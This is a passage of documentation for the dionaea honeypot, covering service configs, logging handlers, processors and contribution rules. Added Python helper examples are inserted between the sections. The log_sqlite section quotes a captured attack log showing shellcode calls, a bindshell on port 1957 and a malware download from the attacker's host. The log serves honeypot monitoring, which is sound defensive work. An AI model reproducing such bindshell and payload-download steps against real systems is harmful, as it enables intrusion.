885 you will not even be able to connect to your ssh daemon.
886
887 Even if you add an exemption for ssh like:
888
889 iptables -A INPUT -i eth0 -p tcp --syn -m state --state NEW --destination-port ! 22 -j NFQUEUE
890
891 dionaea will try to create a new service for /every/ incoming connec‐
892 tion, even if there is a service running already. As it is easy to
893 avoid this, I recommend sticking with the recommendation. Besides the
894 already mention throttle settings, there are various timeouts for the
895 nfq mirror service in the config. You can control how long the service
896 will wait for new connections (/timeouts.server.listen/), and how long
897 the mirror connection will be idle (/timeouts.client.idle/) and sustain
898 (/timeouts.client.sustain/).
899
900 PPTP
901 Example config
902 services/pptp.yaml.INDENT 0.0
903
904 - name: pptp
905 config:
906 # Cisco PIX
907 # firmware_revision: 4608
908 # hostname:
909 # vendor_name: Cisco Systems
910
911 # DrayTek
912 # firmware_revision: 1
913 # hostname: Vigor
914 # vendor_name: DrayTek
915
916 # Linux
917 # firmware_revision: 1
918 # hostname: local
919 # vendor_name: linux
920
921 # Windows
922 # firmware_revision: 0
923 # hostname:
924 # vendor_name: Microsoft
925
926 # MikroTik router
927 # firmware_revision: 1
928 # hostname: MikroTik
929 # vendor_name: MikroTik
930
931
932 SIP (VoIP)
933 This is a VoIP module for the honeypot dionaea. The VoIP protocol used
934 is SIP since it is the de facto standard for VoIP today. In contrast to
935 some other VoIP honeypots, this module doesn’t connect to an external
936 VoIP registrar/server. It simply waits for incoming SIP messages (e.g.
937 OPTIONS or even INVITE), logs all data as honeypot incidents and/or
938 binary data dumps (RTP traffic), and reacts accordingly, for instance
939 by creating a SIP session including an RTP audio channel. As sophisti‐
940 cated exploits within the SIP payload are not very common yet, the hon‐
941 eypot module doesn’t pass any code to dionaea’s code emulation engine.
942 This will be implemented if we spot such malicious messages. The main
943 features of the VoIP module are:
944
945 · Support for most SIP requests (OPTIONS, INVITE, ACK, CANCEL, BYE)
946
947 · Support for multiple SIP sessions and RTP audio streams
948
949 · Record all RTP data (optional)
950
951 · Set custom SIP username and secret (password)
952
953 · Set custom useragent to mimic different phone models
954
955 · Uses dionaea’s incident system to log to SQL database
956
957 Personalities
958 A personality defines how to handle a request. At least the ‘default’
959 personality MUST exist. The following options are available per person‐
960 ality.
961
962 serve
963 A list of IP addresses to use this personality for.
964
965 handle
966 List of SIP methods to handle.
967
968 SIP Users
969 You can easily add, change or remove users by editing the SQLite file
970 specified by the ‘users = “”’ parameter in the config file. All users
971 are specified in the users table.
972
973 username
974 Specifies the name of the user. This value is treated as regular
975 expression. See Python: Regular Expressions <‐
976 http://docs.python.org/py3k/library/re.html> for more information.
977
978 password
979 The password.
980
981 personality
982 The user is only available in the personality specified by this
983 value. You can define a personality in the config file.
984
985 pickup_delay_min
986 This is an integer value. Let the phone ring for at least this num‐
987 ber of seconds.
988
989 pickup_delay_max
990 This is an integer value. Maximum number of seconds to wait before
991 dionaea picks up the phone.
992
993 action
994 This value is not used yet.
995
996 sdp
997 The name of the SDP to use. See table ‘sdp’.
998
999 SDP
1000 All SDPs can be defined in the sdp table in the users database.
1001
1002 name
1003 Name of the SDP
1004
1005 sdp
1006 The value to use as SDP
1007
1008 The following values are available in the SDP definition.
1009
1010 {addrtype}
1011 Address type. (IP4 or IP6)
1012
1013 {unicast_address}
1014 RTP address
1015
1016 {audio_port}
1017 Dionaea audio port.
1018
1019 {video_port}
1020 Dionaea video port.
1021
1022 The following control parameters are available in the SDP definition.
1023
1024 [audio_port]…content…[/audio_port]
1025 The content is only available in the output if the audio_port value
1026 is set.
1027
1028 [video_port]…content…[/video_port]
1029 The content is only available in the output if the video_port value
1030 is set.
1031
1032 Example:
1033
1034 v=0
1035 o=- 1304279835 1 IN {addrtype} {unicast_address}
1036 s=SIP Session
1037 c=IN {addrtype} {unicast_address}
1038 t=0 0
1039 [audio_port]
1040 m=audio {audio_port} RTP/AVP 111 0 8 9 101 120
1041 a=sendrecv
1042 a=rtpmap:111 Speex/16000/1
1043 a=fmtp:111 sr=16000,mode=any
1044 a=rtpmap:0 PCMU/8000/1
1045 a=rtpmap:8 PCMA/8000/1
1046 a=rtpmap:9 G722/8000/1
1047 a=rtpmap:101 telephone-event/8000
1048 a=fmtp:101 0-16,32,36
1049 a=rtpmap:120 NSE/8000
1050 a=fmtp:120 192-193
1051 [/audio_port]
1052 [video_port]
1053 m=video {video_port} RTP/AVP 34 96 97
1054 c=IN {addrtype} {unicast_address}
1055 a=rtpmap:34 H263/90000
1056 a=fmtp:34 QCIF=2
1057 a=rtpmap:96 H263-1998/90000
1058 a=fmtp:96 QCIF=2
1059 a=rtpmap:97 H263-N800/90000
1060 [/video_port]
1061
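As an added example (not dionaea’s own code), a small renderer for this SDP template syntax: it drops the [audio_port]…[/audio_port] and [video_port]…[/video_port] blocks whose value is unset, fills the {…} placeholders and derives {addrtype} from the address family. The function names and the shortened sample template are my own.

```python
import ipaddress
import re

# Constructed template (shortened from the example above) using the
# {placeholder} values and [name]...[/name] control blocks the sip module documents.
SDP_TEMPLATE = """v=0
o=- 1304279835 1 IN {addrtype} {unicast_address}
s=SIP Session
c=IN {addrtype} {unicast_address}
t=0 0
[audio_port]
m=audio {audio_port} RTP/AVP 0 8 101
a=sendrecv
a=rtpmap:0 PCMU/8000/1
a=rtpmap:8 PCMA/8000/1
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16,32,36
[/audio_port]
[video_port]
m=video {video_port} RTP/AVP 34
c=IN {addrtype} {unicast_address}
a=rtpmap:34 H263/90000
[/video_port]
"""

# [name] ... [/name] with the surrounding newlines; DOTALL so the body spans lines.
CONTROL_BLOCK = re.compile(r"\[(\w+)\]\n?(.*?)\[/\1\]\n?", re.DOTALL)


class _KeepUnknown(dict):
    """Leave placeholders we have no value for untouched instead of raising KeyError."""

    def __missing__(self, key):
        return "{" + key + "}"


def render_sdp(template, unicast_address, audio_port=None, video_port=None):
    """Render an SDP body for one session (hypothetical helper, not dionaea's API).

    addrtype is derived from the address family, control blocks whose value
    is None are removed, then the remaining {..} placeholders are filled."""
    addr = ipaddress.ip_address(unicast_address)
    values = {
        "addrtype": "IP6" if addr.version == 6 else "IP4",
        "unicast_address": str(addr),
        "audio_port": audio_port,
        "video_port": video_port,
    }

    def keep_or_drop(match):
        name, body = match.group(1), match.group(2)
        return body if values.get(name) is not None else ""

    stripped = CONTROL_BLOCK.sub(keep_or_drop, template)
    present = _KeepUnknown((k, v) for k, v in values.items() if v is not None)
    return stripped.format_map(present)


def media_lines(sdp):
    """Return the (media, port) pairs announced by the m= lines of an SDP body."""
    out = []
    for line in sdp.splitlines():
        if line.startswith("m="):
            media, port = line[2:].split()[:2]
            out.append((media, int(port)))
    return out
```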
1062 Example config
1063 services/sip.yaml
1064
1065 - name: sip
1066 config:
1067 udp_ports:
1068 - 5060
1069 tcp_ports:
1070 - 5060
1071 tls_ports:
1072 - 5061
1073 users: "@LOCALESTATEDIR@/lib/dionaea/sipaccounts.sqlite"
1074 rtp:
1075 enable: true
1076 # how to dump the rtp stream
1077 # bistream = dump as bistream
1078 modes:
1079 - bistream
1080 - pcap
1081 pcap:
1082 path: "var/dionaea/rtp/{personality}/%Y-%m-%d/"
1083 filename: "%H:%M:%S_{remote_host}_{remote_port}_in.pcap"
1084 personalities:
1085 default:
1086 domain: "localhost"
1087 name: "softphone"
1088 personality: "generic"
1089 # next-server:
1090 # domain: "my-domain"
1091 # name: "my server"
1092 # personality: "generic"
1093 # serve: ["10.0.0.1"]
1094 # default_sdp: "default"
1095 # handle: ["REGISTER", "INVITE", "BYE", "CANCEL", "ACK"]
1096
1097 actions:
1098 bank-redirect:
1099 do: "redirect"
1100 params:
1101 play-hello:
1102 do: "play"
1103 params:
1104 file: "var/dionaea/.../file.ext"
1105
1106
1107 SMB
1108 The main protocol offered by dionaea is SMB. SMB has a decent history of
1109 remotely exploitable bugs, and is a very popular target for worms.
1110 dionaea’s SMB implementation makes use of a python3 adapted version of
1111 scapy. As scapy’s own version of SMB was pretty limited, almost
1112 everything but the Field declarations had to be rewritten. The SMB emulation
1113 written for dionaea is used by the mwcollectd
1114 <http://code.mwcollect.org> low interaction honeypot too. Besides the
1115 known attacks on SMB dionaea supports uploading files to smb shares.
1116 Adding new DCE remote procedure calls is a good start to get into
1117 dionaea code, you can use:
1118
1119 SELECT
1120 COUNT(*),
1121 dcerpcrequests.dcerpcrequest_uuid,
1122 dcerpcservice_name,
1123 dcerpcrequest_opnum
1124 FROM
1125 dcerpcrequests
1126 JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
1127 LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )
1128 WHERE
1129 dcerpcserviceop_name IS NULL
1130 GROUP BY
1131 dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
1132 ORDER BY
1133 COUNT(*) DESC;
1134
1135 to identify potentially useful targets among unknown dcerpc calls using the
1136 data you gathered and stored in your logsql database. Patches are
1137 appreciated.
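
As an added example (not dionaea’s own code), the query above run against a constructed in-memory copy of the three tables it joins. The schema is reconstructed from the column names the query uses (key columns and the rest of the layout are assumed), the sample rows and UUIDs are made up, and a companion query lists requests for interface UUIDs that the inner join silently drops.

```python
import sqlite3

# Minimal reconstruction of the three log_sqlite tables the query joins. The
# column names are the ones the query above uses; key columns and the
# remaining layout are assumed for this example.
SCHEMA = """
CREATE TABLE dcerpcservices (
    dcerpcservice       INTEGER PRIMARY KEY,
    dcerpcservice_uuid  TEXT NOT NULL,
    dcerpcservice_name  TEXT NOT NULL
);
CREATE TABLE dcerpcserviceops (
    dcerpcserviceop        INTEGER PRIMARY KEY,
    dcerpcservice          INTEGER NOT NULL REFERENCES dcerpcservices(dcerpcservice),
    dcerpcserviceop_opnum  INTEGER NOT NULL,
    dcerpcserviceop_name   TEXT NOT NULL
);
CREATE TABLE dcerpcrequests (
    dcerpcrequest        INTEGER PRIMARY KEY,
    connection           INTEGER,
    dcerpcrequest_uuid   TEXT NOT NULL,
    dcerpcrequest_opnum  INTEGER NOT NULL
);
"""

# The query from the text: requests for a known interface whose opnum has no
# implementation in dcerpcserviceops, most frequent first.
UNKNOWN_OPNUMS = """
SELECT COUNT(*), dcerpcrequests.dcerpcrequest_uuid, dcerpcservice_name, dcerpcrequest_opnum
FROM dcerpcrequests
JOIN dcerpcservices
  ON dcerpcrequests.dcerpcrequest_uuid = dcerpcservices.dcerpcservice_uuid
LEFT OUTER JOIN dcerpcserviceops
  ON dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum
 AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice
WHERE dcerpcserviceop_name IS NULL
GROUP BY dcerpcrequests.dcerpcrequest_uuid, dcerpcservice_name, dcerpcrequest_opnum
ORDER BY COUNT(*) DESC;
"""

# The inner join above drops requests for interface UUIDs dionaea does not
# know at all; this companion query lists those separately.
UNKNOWN_INTERFACES = """
SELECT COUNT(*), dcerpcrequest_uuid
FROM dcerpcrequests
WHERE dcerpcrequest_uuid NOT IN (SELECT dcerpcservice_uuid FROM dcerpcservices)
GROUP BY dcerpcrequest_uuid
ORDER BY COUNT(*) DESC;
"""


def unknown_opnums(conn):
    return conn.execute(UNKNOWN_OPNUMS).fetchall()


def unknown_interfaces(conn):
    return conn.execute(UNKNOWN_INTERFACES).fetchall()


def build_sample_db():
    """In-memory database with constructed rows (UUIDs and service names are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO dcerpcservices VALUES (?, ?, ?)",
        [(1, "11111111-0000-0000-0000-000000000001", "ServiceA"),
         (2, "22222222-0000-0000-0000-000000000002", "ServiceB")],
    )
    # ServiceA implements opnums 0 and 9; ServiceB implements nothing yet.
    conn.executemany(
        "INSERT INTO dcerpcserviceops VALUES (?, ?, ?, ?)",
        [(1, 1, 0, "OpZero"), (2, 1, 9, "OpNine")],
    )
    requests = (
        [("11111111-0000-0000-0000-000000000001", 9)] * 3     # handled by OpNine
        + [("11111111-0000-0000-0000-000000000001", 12)] * 2  # known interface, unknown opnum
        + [("22222222-0000-0000-0000-000000000002", 4)] * 5   # known interface, no ops at all
        + [("33333333-0000-0000-0000-000000000003", 1)] * 2   # interface not in dcerpcservices
    )
    conn.executemany(
        "INSERT INTO dcerpcrequests (connection, dcerpcrequest_uuid, dcerpcrequest_opnum) "
        "VALUES (?, ?, ?)",
        [(cid, uuid, opnum) for cid, (uuid, opnum) in enumerate(requests, start=600)],
    )
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for count, uuid, name, opnum in unknown_opnums(db):
        print(f"{count:4d}  {name:<10} {uuid}  opnum {opnum}")
    for count, uuid in unknown_interfaces(db):
        print(f"{count:4d}  <unknown interface> {uuid}")
```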
1138
1139 Example config
1140 services/smb.yaml
1141
1142 - name: smb
1143 config:
1144
1145 ## Generic setting ##
1146
1147 # 1:"Windows XP Service Pack 0/1",
1148 # 2:"Windows XP Service Pack 2",
1149 # 3:"Windows XP Service Pack 3",
1150 # 4:"Windows 7 Service Pack 1",
1151 # 5:"Linux Samba 4.3.11"
1152 # os_type: 2
1153
1154 # Additional config
1155 # primary_domain: Test
1156 # oem_domain_name: Test
1157 # server_name: TEST-SERVER
1158
1159 ## Windows 7 ##
1160 # native_os: Windows 7 Professional 7600
1161 # native_lan_manager: Windows 7 Professional 6.1
1162 # shares:
1163 # ADMIN$:
1164 # comment: Remote Admin
1165 # path: C:\\Windows
1166 # type: disktree
1167 # C$:
1168 # coment: Default Share
1169 # path: C:\\
1170 # type:
1171 # - disktree
1172 # - special
1173 # IPC$:
1174 # comment: Remote IPC
1175 # type: ipc
1176 # Printer:
1177 # comment: Microsoft XPS Document Writer
1178 # type: printq
1179
1180 ## Samba ##
1181 # native_os: Windows 6.1
1182 # native_lan_manager: Samba 4.3.11
1183 # shares:
1184 # admin:
1185 # comment: Remote Admin
1186 # path: \\home\\admin
1187 # type: disktree
1188 # share:
1189 # coment: Default Share
1190 # path: \\share
1191 # type: disktree
1192 # IPC$:
1193 # comment: Remote IPC
1194 # path: IPC Service
1195 # type: ipc
1196 # Printer:
1197 # comment: Printer Drivers
1198 # type: printq
1199
1200
1201 TFTP
1202 Written to test the udp connection code, dionaea provides a tftp server
1203 on port 69, which can serve files. Even though there were
1204 vulnerabilities in tftp services, I’m yet to see an automated attack on tftp
1205 services.
1206
1207 Example config
1208 services/tftp.yaml
1209
1210 - name: tftp
1211 config:
1212 root: /var/lib/dionaea/roots/tftp
1213
1214
1215 UPnP
1216 Example config
1217 services/upnp.yaml
1218
1219 - name: upnp
1220 config:
1221 root: /var/lib/dionaea/roots/upnp
1222 # maximum size in kbytes of the request (32MB)
1223 max_request_size: 32768
1224 personality:
1225 # default
1226 cache: "CACHE-CONTROL: max-age=120\r\n"
1227 st: "ST: upnp:rootdevice\r\n"
1228 usn: "USN: uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n"
1229 server: "SERVER: Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n"
1230 location: "LOCATION: http://192.168.0.1:49152/IPMIdevicedesc.xml\r\n"
1231 opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1232 # # Samsung TV
1233 # cache: "CACHE-CONTROL: max-age=900\r\n"
1234 # st: "ST: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1235 # usn: "USN: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1236 # server: "SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0\r\n"
1237 # location: "LOCATION: http://192.168.0.10:7677/MainTVServer2\r\n"
1238 # opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1239 #
1240 # # XBOX 360
1241 # cache: "CACHE-CONTROL: max-age=1800\r\n"
1242 # st: "ST: urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1243 # usn: "USN: uuid:531c567a-8c46-4201-bcd4-09afa554d859::urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1244 # server: "SERVER: Microsoft-Windows/6.3 UPnP/1.0 UPnP-Device-Host/1.0\r\n"
1245 # location: "LOCATION: http://192.168.0.10:1055/upnphost/udhisapi.dll?content=uuid:531c567a-8c46-4201-bcd4-09afa554d859\r\n"
1246 # opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1247
1248
1250 Getting a copy of the malware is cool, getting an overview of the
1251 attacks run on your sensor is priceless.
1252
1253 dionaea can write information to a text file, but be aware, dionaea’s
1254 logging to text files is rather chatty, really chatty, and you do not
1255 want to look at the information, if you are not debugging the software
1256 or writing some new feature for it.
1257
1258 Of course, you can apply filters to the logging, to limit it to
1259 different facilities or levels, but in general you do not want to work with
1260 text files.
1261
1262 dionaea uses an internal communication system which is called
1263 incidents. An incident has an origin, which is a string, a path, and
1264 properties, which can be integers, strings, or a pointer to a connection.
1265 Incidents are kept minimal: they pass only the information required to
1266 incident handlers (ihandler). An ihandler can register a path for
1267 incidents it wants to get informed about; the paths are matched in a glob
1268 like fashion. Therefore logging information using an ihandler is
1269 superior to text logging: you get the information you are looking for, and
1270 can write it to a format you choose yourself.
1271
1272 List of available ihandlers
1273
1274 emuprofile
1275 Example config
1276 ihandlers/emuprofile.yaml
1277
1278 - name: emuprofile
1279
1280
1281 fail2ban
1282 Example config
1283 ihandlers/fail2ban.yaml
1284
1285 - name: fail2ban
1286 config:
1287 downloads: "/var/lib/dionaea/downloads.f2b"
1288 offers: "/var/lib/dionaea/offers.f2b"
1289
1290
1291 ftp
1292 Example config
1293 ihandlers/ftp.yaml
1294
1295 # ftp client section
1296 - name: ftp
1297 config:
1298 # host for active ftp via NAT
1299 # * 0.0.0.0 - the initiating connection ip is used for active ftp
1300 # * not 0.0.0.0 - gets resolved as hostname and used
1301 active_host: "0.0.0.0"
1302
1303 # ports for active ftp; string indicating a range
1304 active_ports: 63001-64000
1305
1306
1307 hpfeeds
1308 Example config
1309 ihandlers/hpfeeds.yaml
1310
1311 - name: hpfeeds
1312 config:
1313 server: "hpfriends.honeycloud.net"
1314 port: 10000
1315 ident: ""
1316 secret: ""
1317 # dynip_resolve: enable to lookup the sensor ip through a webservice
1318 dynip_resolve: "http://hpfriends.honeycloud.net/ip"
1319
1320
1321 log_db_sql
1322 WARNING:
1323 This ihandler is experimental.
1324
1325 This incident handler can write interesting information about attacks
1326 and connections into an SQL database. It uses SQLAlchemy to support
1327 different databases.
1328
1329 Example config
1330 ihandlers/log_db_sql.yaml
1331
1332 - name: log_db_sql
1333 config:
1334 url: sqlite:////var/lib/dionaea/dionaea.db
1335
1336
1337 log_incident
1338 This ihandler can be used to export incidents in realtime to be
1339 processed by external programs.
1340
1341 WARNING:
1342 This ihandler is in pre alpha state and it might be changed or
1343 removed in the future.
1344
1345 Configure
1346 handlers
1347 List of URLs to submit the information to. At the moment only file,
1348 http and https are supported.
1349
1350 Format
1351 {
1352 "name": "<sensor-name>",
1353 "origin": "<name of the incident>",
1354 "timestamp": "<date in ISO 8601>",
1355 "data": {
1356 "connection": {
1357 "id": <internal ID>,
1358 "local_ip": "<local IP>",
1359 "local_port": <local port>,
1360 "remote_ip": "<remote IP>",
1361 "remote_hostname": "<remote hostname if resolvable>",
1362 "remote_port": <remote port>,
1363 "protocol": "<protocol>",
1364 "transport": "<transport tcp|udp>"
1365 }
1366 }
1367 }
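
As an added example (not dionaea’s own code) that serves both the description of the incident system above and this record format: a small incident bus that glob-matches origin paths against registered ihandlers, a handler that emits records in the layout just shown, and a summary over the exported records. The Connection class, the fnmatch-based matching, the sensor name and the incident values are assumptions made for the example.

```python
import fnmatch
import json
from datetime import datetime, timezone


class Connection:
    """Constructed stand-in for the connection object an incident may point to."""

    def __init__(self, cid, protocol, transport, local, remote, remote_hostname=""):
        self.id = cid
        self.protocol = protocol
        self.transport = transport
        self.local_ip, self.local_port = local
        self.remote_ip, self.remote_port = remote
        self.remote_hostname = remote_hostname


class IncidentBus:
    """Deliver incidents to ihandlers whose registered path glob-matches the origin.

    Assumption: fnmatch semantics, so '*' also spans the dots of an origin path."""

    def __init__(self):
        self._handlers = []  # (pattern, callable)

    def register(self, pattern, handler):
        self._handlers.append((pattern, handler))

    def report(self, origin, **props):
        """Dispatch one incident; returns how many handlers received it."""
        delivered = 0
        for pattern, handler in self._handlers:
            if fnmatch.fnmatchcase(origin, pattern):
                handler(origin, props)
                delivered += 1
        return delivered


class LogIncidentHandler:
    """Collect records in the log_incident layout shown above."""

    def __init__(self, sensor_name, clock=None):
        self.sensor_name = sensor_name
        self.clock = clock or (lambda: datetime.now(timezone.utc))
        self.records = []

    def __call__(self, origin, props):
        data = {}
        con = props.get("con")
        if con is not None:
            data["connection"] = {
                "id": con.id,
                "local_ip": con.local_ip,
                "local_port": con.local_port,
                "remote_ip": con.remote_ip,
                "remote_hostname": con.remote_hostname,
                "remote_port": con.remote_port,
                "protocol": con.protocol,
                "transport": con.transport,
            }
        self.records.append({"name": self.sensor_name, "origin": origin,
                             "timestamp": self.clock().isoformat(), "data": data})

    def as_json_lines(self):
        """One JSON object per line, as a consumer of the file: handler would read it."""
        return "\n".join(json.dumps(r, sort_keys=True) for r in self.records)


def connections_per_remote(records):
    """Count accepted connections per (remote IP, protocol) in exported records."""
    counts = {}
    for rec in records:
        con = rec["data"].get("connection")
        if con is None or not rec["origin"].endswith(".accept"):
            continue
        key = (con["remote_ip"], con["protocol"])
        counts[key] = counts.get(key, 0) + 1
    return counts


def demo():
    """Wire two handlers and feed constructed incidents; returns (log handler, accept hits, deliveries)."""
    fixed_clock = lambda: datetime(2018, 5, 1, 12, 0, tzinfo=timezone.utc)
    log = LogIncidentHandler("sensor-01", clock=fixed_clock)
    accepts = []
    bus = IncidentBus()
    bus.register("dionaea.connection.*", log)  # every connection incident
    bus.register("dionaea.connection.tcp.accept", lambda o, p: accepts.append(o))
    c1 = Connection(610, "smbd", "tcp", ("10.69.53.52", 445), ("10.65.34.231", 2010))
    c2 = Connection(611, "smbd", "tcp", ("10.69.53.52", 445), ("10.65.34.231", 2011))
    c3 = Connection(612, "sipd", "udp", ("10.69.53.52", 5060), ("10.65.34.240", 5060))
    deliveries = [
        bus.report("dionaea.connection.tcp.accept", con=c1),
        bus.report("dionaea.connection.tcp.accept", con=c2),
        bus.report("dionaea.connection.udp.connect", con=c3),
        bus.report("dionaea.connection.free", con=c1),
        bus.report("dionaea.download.complete", path="/tmp/sample"),  # origin assumed; matches nothing here
    ]
    return log, accepts, deliveries
```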
1368
1369 Example config
1370 ihandlers/log_incident.yaml
1371
1372 - name: log_incident
1373 config:
1374 handlers:
1375 #- http://127.0.0.1:8080/
1376 - file:///var/lib/dionaea/dionaea_incident.json
1377
1378
1379 log_json
1380 This ihandler can submit information about attacks/connections encoded
1381 as json.
1382
1383 WARNING:
1384 This ihandler is in pre alpha state and it might be changed or
1385 removed in the near future.
1386
1387 Configure
1388 flat_data
1389 Set to true to flatten object lists.
1390
1391 handlers
1392 List of URLs to submit the information to. At the moment only file,
1393 http and https are supported.
1394
1395 Format
1396 Format of the connection information:
1397
1398 {
1399 "connection": {
1400 "local": {
1401 "address": "<string:local ip address>",
1402 "port": <integer:local port>
1403 },
1404 "protocol": "<string:service name e.g. httpd>",
1405 "remote": {
1406 "address": "<string:remote ip address>",
1407 "port": <integer:remote port>
1408 "hostname": "<string:hostname of the remote host>"
1409 },
1410 "transport": "<string:transport protocol e.g. tcp or udp>",
1411 "type": "<string:connection type e.g. accepted, listen, ...>"
1412 }
1413 }
1414
1415 Example config
1416 ihandlers/log_json.yaml
1417
1418 - name: log_json
1419 config:
1420 # Uncomment next line to flatten object lists to work with ELK
1421 # flat_data: true
1422 handlers:
1423 #- http://127.0.0.1:8080/
1424 - file:///var/lib/dionaea/dionaea.json
1425
1426
1427 log_sqlite
1428 WARNING:
1429 This ihandler was renamed in dionaea 0.4.0 from logsql to
1430 log_sqlite.
1431
1432 This is what the logsql python script does: it is an ihandler, and
1433 writes interesting incidents to a sqlite database. One of the benefits
1434 of this logging is the ability to cluster incidents based on the
1435 initial attack when retrieving the data from the database:
1436
1437 connection 610 smbd tcp accept 10.69.53.52:445 <- 10.65.34.231:2010
1438 dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' opnum 9
1439 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1440 profile: [{'return': '0x7c802367', 'args': ['', 'CreateProcessA'], 'call': 'GetProcAddress'},
1441 ...., {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
1442 service: bindshell://1957
1443 connection 611 remoteshell tcp listen 10.69.53.52:1957
1444 connection 612 remoteshell tcp accept 10.69.53.52:1957 <- 10.65.34.231:2135
1445 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1446 offer: fxp://1:1@10.65.34.231:8218/ssms.exe
1447 download: 1d419d615dbe5a238bbaa569b3829a23 fxp://1:1@10.65.34.231:8218/ssms.exe
1448 connection 613 ftpctrl tcp connect 10.69.53.52:37065 -> 10.65.34.231/None:8218
1449 connection 614 ftpdata tcp listen 10.69.53.52:62087
1450 connection 615 ftpdata tcp accept 10.69.53.52:62087 <- 10.65.34.231:2308
1451 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1452
1453 Additionally, you can query the database for many different things,
1454 refer to:
1455
1456 · dionaea sql logging 2009/11/06
1457
1458 · post it yourself 2009/12/08
1459
1460 · sqlite performance 2009/12/12
1461
1462 · virustotal fun 2009/12/14
1463
1464 · Andrew Waite’s Blog for mimic-nepstats.py
1465
1466 for more examples of how to make use of the database.
1467
1468 Example config
1469 ihandlers/log_sqlite.yaml
1470
1471 - name: log_sqlite
1472 config:
1473 file: /var/lib/dionaea/dionaea.sqlite
1474
1475
1476
1477 nfq
1478 Example config
1479 ihandlers/nfq.yaml
1480
1481 - name: nfq
1482 # nfq can intercept incoming tcp connections during the tcp handshake
1483 # giving your honeypot the possibility to provide service on
1484 # ports which are not served by default.
1485 # refer to the documentation BEFORE using this
1486 config:
1487 # 0 = DROP
1488 nfaction: 0
1489 throttle:
1490 window : 30
1491 limits:
1492 total: 30
1493 slot: 30
1494 timeouts:
1495 server:
1496 listen: 5
1497 client:
1498 idle: 10
1499 sustain: 240
1500
1501
1502 p0f
1503 Example config
1504 ihandlers/p0f.yaml
1505
1506 - name: p0f
1507 config:
1508 # start p0f with
1509 # sudo p0f -i any -u root -Q /tmp/p0f.sock -q -l
1510 path: "un:///tmp/p0f.sock"
1511
1512
1513 store
1514 Example config
1515 ihandlers/store.yaml
1516
1517 - name: store
1518
1519
1520 submit_http
1521 Example config
1522 ihandlers/submit_http.yaml
1523
1524 - name: submit_http
1525 config:
1526 # the url to send the submission requests to
1527 url: "http://example.org/"
1528 # E-Mail (optional)
1529 # email: ""
1530 # username (optional)
1531 # user:
1532 # password (optional)
1533 # pass:
1534
1535
1536 submit_http_post
1537 Example config
1538 ihandlers/submit_http_post.yaml
1539
1540 - name: submit_http_post
1541 config:
1542 submit:
1543 file_upload:
1544 urls:
1545 - http://example.org/upload
1546 - http://example.com/file.php
1547 field_values:
1548 submit: "Upload file"
1549 file_fieldname: upload_file
1550
1551
1552 tftp_download
1553 Example config
1554 ihandlers/tftp_download.yaml
1555
1556 - name: tftp_download
1557
1558
1559 VirusTotal
1560 This ihandler submits the captured malware samples to the VirusTotal
1561 service for further analysis.
1562
1563 Configuration
1564 apikey
1565 The VirusTotal API key.
1566
1567 file
1568 SQLite database file used to cache the results.
1569
1570 Example config
1571 ihandlers/virustotal.yaml
1572
1573 - name: virustotal
1574 config:
1575 # grab it from your virustotal account at My account -> Inbox -> Public API
1576 apikey: "........."
1577 file: "/var/lib/dionaea/vtcache.sqlite"
1578
1579
1581 Processors control the actions done on the bi-directional streams we
1582 gain when getting attacked. The default is running the emu processor on
1583 them to detect shellcode.
1584
1585 Emu
1586 Use libemu to find and emulate shellcodes.
1587
1588 Configuration
1589 Filter
1590 Only continue with the processing pipeline if all conditions match.
1591
1592 Configuration
1593 protocols
1594 Comma separated list of protocols.
1595
1596 types
1597 Comma separated list of connection types.
1598
1599 · accept - dionaea accepts a new connection from a remote host
1600
1601 · connect - dionaea makes a connection to a remote host
1602
1603 Streamdumper
1604 This processor can dump a connection as a bi-directional stream. The
1605 dump can be used to replay an attack at IP level without messing with
1606 pcap and tcpreplay.
1607
1608 Configuration
1609 path
1610 Dumps will be created in this directory.
1611
1613 First of all, thank you for your interest in contributing to dionaea!
1614
1615 Filing bug reports
1616 Bug reports are very welcome. Please file them on the GitHub issue
1617 tracker. Good bug reports come with extensive descriptions of the
1618 error and how to reproduce it.
1619
1620 Patches
1621 All patches to dionaea should be submitted in the form of pull requests
1622 to the main dionaea repository, DinoTools/dionaea. These pull requests
1623 should satisfy the following properties:
1624
1625 Code
1626 · The pull request should focus on one particular improvement to
1627 dionaea.
1628
1629 · Create different pull requests for unrelated features or bugfixes.
1630
1631 · Python code should follow PEP 8, especially in the “do what code
1632 around you does” sense.
1633
1634 Documentation
1635 When introducing new functionality, please remember to write
1636 documentation.
1637
1638 Review
1639 Finally, pull requests must be reviewed before merging. Everyone can
1640 perform reviews; this is a very valuable way to contribute, and is
1641 highly encouraged.
1642
1644 dionaea initial development was funded by the Honeynet Project as part
1645 of the Honeynets Summer of Code during 2009. The development process
1646 is as open as possible. You can browse the source online and report
